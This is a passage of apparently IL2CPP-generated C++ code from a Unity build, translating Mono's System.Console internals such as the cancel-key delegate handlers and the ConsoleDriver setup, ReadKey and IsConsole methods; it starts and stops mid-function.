int32_t >::Invoke(targetMethod, targetThis, ___keyCode0); else result = GenericVirtFuncInvoker1< bool, int32_t >::Invoke(targetMethod, targetThis, ___keyCode0); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) result = InterfaceFuncInvoker1< bool, int32_t >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis, ___keyCode0); else result = VirtFuncInvoker1< bool, int32_t >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis, ___keyCode0); } } } else { typedef bool (*FunctionPointerType) (void*, int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(targetThis, ___keyCode0, targetMethod); } } } } else { Il2CppMethodPointer targetMethodPointer = __this->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(__this->get_method_3()); RuntimeObject* targetThis = __this->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 1) { // open typedef bool (*FunctionPointerType) (int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(___keyCode0, targetMethod); } else { // closed typedef bool (*FunctionPointerType) (void*, int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(targetThis, ___keyCode0, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (targetThis == NULL) { typedef bool (*FunctionPointerType) (int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(___keyCode0, targetMethod); } else if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) result = GenericInterfaceFuncInvoker1< bool, int32_t >::Invoke(targetMethod, targetThis, ___keyCode0); else result = GenericVirtFuncInvoker1< bool, int32_t >::Invoke(targetMethod, targetThis, ___keyCode0); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) result = InterfaceFuncInvoker1< bool, int32_t >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis, ___keyCode0); else result = VirtFuncInvoker1< bool, int32_t >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis, ___keyCode0); } } } else { typedef bool (*FunctionPointerType) (void*, int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(targetThis, ___keyCode0, targetMethod); } } } return result; } // System.IAsyncResult System.Console/WindowsConsole/WindowsCancelHandler::BeginInvoke(System.Int32,System.AsyncCallback,System.Object) extern "C" IL2CPP_METHOD_ATTR RuntimeObject* WindowsCancelHandler_BeginInvoke_m81C599A998316D97045F021332275532AFFBAB2D (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, int32_t ___keyCode0, AsyncCallback_t3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4 * ___callback1, RuntimeObject * ___object2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (WindowsCancelHandler_BeginInvoke_m81C599A998316D97045F021332275532AFFBAB2D_MetadataUsageId); s_Il2CppMethodInitialized = true; } void *__d_args[2] = {0}; __d_args[0] = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &___keyCode0); return (RuntimeObject*)il2cpp_codegen_delegate_begin_invoke((RuntimeDelegate*)__this, __d_args, (RuntimeDelegate*)___callback1, (RuntimeObject*)___object2); } // System.Boolean System.Console/WindowsConsole/WindowsCancelHandler::EndInvoke(System.IAsyncResult) extern "C" IL2CPP_METHOD_ATTR bool WindowsCancelHandler_EndInvoke_m09FBBD984881460084F4F50D0A99E0A752DB4CB0 (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, RuntimeObject* ___result0, const RuntimeMethod* method) { RuntimeObject *__result = il2cpp_codegen_delegate_end_invoke((Il2CppAsyncResult*) ___result0, 0); return *(bool*)UnBox ((RuntimeObject*)__result); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.ConsoleCancelEventArgs::.ctor(System.ConsoleSpecialKey) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventArgs__ctor_mF734EC3C82D0A490C0A05416E566BFC53ACFB471 (ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * __this, int32_t ___type0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleCancelEventArgs__ctor_mF734EC3C82D0A490C0A05416E566BFC53ACFB471_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E_il2cpp_TypeInfo_var); EventArgs__ctor_m3551293259861C5A78CD47689D559F828ED29DF7(__this, /*hidden argument*/NULL); int32_t L_0 = ___type0; __this->set__type_1(L_0); __this->set__cancel_2((bool)0); return; } } // System.Boolean System.ConsoleCancelEventArgs::get_Cancel() extern "C" IL2CPP_METHOD_ATTR bool ConsoleCancelEventArgs_get_Cancel_mA996E8B7FE802D9A15208AFF397481646751A46F (ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * __this, const RuntimeMethod* method) { { bool L_0 = __this->get__cancel_2(); return L_0; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.ConsoleCancelEventHandler::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventHandler__ctor_mDB54F1DD9AFC3C9FB9350057795912934402A8AC (ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method) { __this->set_method_ptr_0(il2cpp_codegen_get_method_pointer((RuntimeMethod*)___method1)); __this->set_method_3(___method1); __this->set_m_target_2(___object0); } // System.Void System.ConsoleCancelEventHandler::Invoke(System.Object,System.ConsoleCancelEventArgs) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventHandler_Invoke_mC7E3B6D8555B865719369DBF255D2BB7E952ADD2 (ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * __this, RuntimeObject * ___sender0, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * ___e1, const RuntimeMethod* method) { DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* delegatesToInvoke = __this->get_delegates_11(); if (delegatesToInvoke != NULL) { il2cpp_array_size_t length = delegatesToInvoke->max_length; for (il2cpp_array_size_t i = 0; i < length; i++) { Delegate_t* currentDelegate = (delegatesToInvoke)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(i)); Il2CppMethodPointer targetMethodPointer = currentDelegate->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(currentDelegate->get_method_3()); RuntimeObject* targetThis = currentDelegate->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 2) { // open typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } else { // closed typedef void (*FunctionPointerType) (void*, RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, ___sender0, ___e1, targetMethod); } } else if (___parameterCount != 2) { // open if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, ___sender0, ___e1); else GenericVirtActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, ___sender0, ___e1); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), ___sender0, ___e1); else VirtActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), ___sender0, ___e1); } } } else { typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (targetThis == NULL) { typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } else if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, targetThis, ___sender0, ___e1); else GenericVirtActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, targetThis, ___sender0, ___e1); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis, ___sender0, ___e1); else VirtActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis, ___sender0, ___e1); } } } else { typedef void (*FunctionPointerType) (void*, RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, ___sender0, ___e1, targetMethod); } } } } else { Il2CppMethodPointer targetMethodPointer = __this->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(__this->get_method_3()); RuntimeObject* targetThis = __this->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 2) { // open typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } else { // closed typedef void (*FunctionPointerType) (void*, RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, ___sender0, ___e1, targetMethod); } } else if (___parameterCount != 2) { // open if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, ___sender0, ___e1); else GenericVirtActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, ___sender0, ___e1); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), ___sender0, ___e1); else VirtActionInvoker1< ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), ___sender0, ___e1); } } } else { typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (targetThis == NULL) { typedef void (*FunctionPointerType) (RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(___sender0, ___e1, targetMethod); } else if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, targetThis, ___sender0, ___e1); else GenericVirtActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(targetMethod, targetThis, ___sender0, ___e1); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis, ___sender0, ___e1); else VirtActionInvoker2< RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * >::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis, ___sender0, ___e1); } } } else { typedef void (*FunctionPointerType) (void*, RuntimeObject *, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, ___sender0, ___e1, targetMethod); } } } } // System.IAsyncResult System.ConsoleCancelEventHandler::BeginInvoke(System.Object,System.ConsoleCancelEventArgs,System.AsyncCallback,System.Object) extern "C" IL2CPP_METHOD_ATTR RuntimeObject* ConsoleCancelEventHandler_BeginInvoke_m8740C0C67047D6F86A56C39F4E179D54886D48B9 (ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * __this, RuntimeObject * ___sender0, ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * ___e1, AsyncCallback_t3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4 * ___callback2, RuntimeObject * ___object3, const RuntimeMethod* method) { void *__d_args[3] = {0}; __d_args[0] = ___sender0; __d_args[1] = ___e1; return (RuntimeObject*)il2cpp_codegen_delegate_begin_invoke((RuntimeDelegate*)__this, __d_args, (RuntimeDelegate*)___callback2, (RuntimeObject*)___object3); } // System.Void System.ConsoleCancelEventHandler::EndInvoke(System.IAsyncResult) extern "C" IL2CPP_METHOD_ATTR void ConsoleCancelEventHandler_EndInvoke_m254F511C1E2AF1BC048E881073E33464EE09E67B (ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * __this, RuntimeObject* ___result0, const RuntimeMethod* method) { il2cpp_codegen_delegate_end_invoke((Il2CppAsyncResult*) ___result0, 0); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.ConsoleDriver::.cctor() extern "C" IL2CPP_METHOD_ATTR void ConsoleDriver__cctor_mD940A3DF23F49F26B5BAC4D5C1D96A9DD48FCA4A (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver__cctor_mD940A3DF23F49F26B5BAC4D5C1D96A9DD48FCA4A_MetadataUsageId); s_Il2CppMethodInitialized = true; } String_t* V_0 = NULL; { bool L_0 = ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731(/*hidden argument*/NULL); if (L_0) { goto IL_0012; } } { RuntimeObject* L_1 = ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17(/*hidden argument*/NULL); ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_driver_0(L_1); return; } IL_0012: { bool L_2 = Environment_get_IsRunningOnWindows_m450E4F44CC5B040187C3E0E42B129780FABE455D(/*hidden argument*/NULL); if (!L_2) { goto IL_0024; } } { RuntimeObject* L_3 = ConsoleDriver_CreateWindowsConsoleDriver_mB2C43CDD6BD7C2159D7B939D8EEBEA9BFC07F5DF(/*hidden argument*/NULL); ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_driver_0(L_3); return; } IL_0024: { String_t* L_4 = Environment_GetEnvironmentVariable_mB94020EE6B0D5BADF024E4BE6FBC54A5954D2185(_stringLiteralB3DB3AF9A0E0243F28ED20FCC3B1D5D1FAAAFBB6, /*hidden argument*/NULL); V_0 = L_4; String_t* L_5 = V_0; bool L_6 = String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE(L_5, _stringLiteral421771305044654A8E7CA3285DDD3E840861E121, /*hidden argument*/NULL); if (!L_6) { goto IL_004d; } } { ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_is_console_1((bool)0); RuntimeObject* L_7 = ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17(/*hidden argument*/NULL); ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_driver_0(L_7); return; } IL_004d: { String_t* L_8 = V_0; RuntimeObject* L_9 = ConsoleDriver_CreateTermInfoDriver_m93B83A6BC60910A8FDFA247BE56A30055E687342(L_8, /*hidden argument*/NULL); ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_driver_0(L_9); return; } } // System.IConsoleDriver System.ConsoleDriver::CreateNullConsoleDriver() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17_MetadataUsageId); s_Il2CppMethodInitialized = true; } { NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D * L_0 = (NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D *)il2cpp_codegen_object_new(NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D_il2cpp_TypeInfo_var); NullConsoleDriver__ctor_mEF6695F8B8CEE021CD5EC693237034A53D484CB2(L_0, /*hidden argument*/NULL); return L_0; } } // System.IConsoleDriver System.ConsoleDriver::CreateWindowsConsoleDriver() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* ConsoleDriver_CreateWindowsConsoleDriver_mB2C43CDD6BD7C2159D7B939D8EEBEA9BFC07F5DF (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver_CreateWindowsConsoleDriver_mB2C43CDD6BD7C2159D7B939D8EEBEA9BFC07F5DF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42 * L_0 = (WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42 *)il2cpp_codegen_object_new(WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42_il2cpp_TypeInfo_var); WindowsConsoleDriver__ctor_m9C9E675288391C478152CCB5789D7726611BF70D(L_0, /*hidden argument*/NULL); return L_0; } } // System.IConsoleDriver System.ConsoleDriver::CreateTermInfoDriver(System.String) extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR RuntimeObject* ConsoleDriver_CreateTermInfoDriver_m93B83A6BC60910A8FDFA247BE56A30055E687342 (String_t* ___term0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver_CreateTermInfoDriver_m93B83A6BC60910A8FDFA247BE56A30055E687342_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___term0; TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * L_1 = (TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 *)il2cpp_codegen_object_new(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_il2cpp_TypeInfo_var); TermInfoDriver__ctor_mDBF60028AEDAE114F1EC4FA8538F29B49AB11EF2(L_1, L_0, /*hidden argument*/NULL); return L_1; } } // System.ConsoleKeyInfo System.ConsoleDriver::ReadKey(System.Boolean) extern "C" IL2CPP_METHOD_ATTR ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ConsoleDriver_ReadKey_m26C9ECDAE36AEE4B923BFDD9420D341AB3DDA900 (bool ___intercept0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver_ReadKey_m26C9ECDAE36AEE4B923BFDD9420D341AB3DDA900_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); RuntimeObject* L_0 = ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->get_driver_0(); bool L_1 = ___intercept0; ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_2 = InterfaceFuncInvoker1< ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 , bool >::Invoke(0 /* System.ConsoleKeyInfo System.IConsoleDriver::ReadKey(System.Boolean) */, IConsoleDriver_t484163236D7810E338FC3D246EDF2DCAC42C0E37_il2cpp_TypeInfo_var, L_0, L_1); return L_2; } } // System.Boolean System.ConsoleDriver::get_IsConsole() extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t G_B5_0 = 0; { IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); bool L_0 = ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->get_called_isatty_2(); if (!L_0) { goto IL_000d; } } { IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); bool L_1 = ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->get_is_console_1(); return L_1; } IL_000d: { IL2CPP_RUNTIME_CLASS_INIT(MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var); intptr_t L_2 = MonoIO_get_ConsoleOutput_m7E36914F192D603C50A8F39745F6443BB2882859(/*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); bool L_3 = ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37((intptr_t)L_2, /*hidden argument*/NULL); if (!L_3) { goto IL_0025; } } { IL2CPP_RUNTIME_CLASS_INIT(MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var); intptr_t L_4 = MonoIO_get_ConsoleInput_mFC797DF758331A0370296F8DF3136A6B9F1995DC(/*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); bool L_5 = ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37((intptr_t)L_4, /*hidden argument*/NULL); G_B5_0 = ((int32_t)(L_5)); goto IL_0026; } IL_0025: { G_B5_0 = 0; } IL_0026: { IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_is_console_1((bool)G_B5_0); 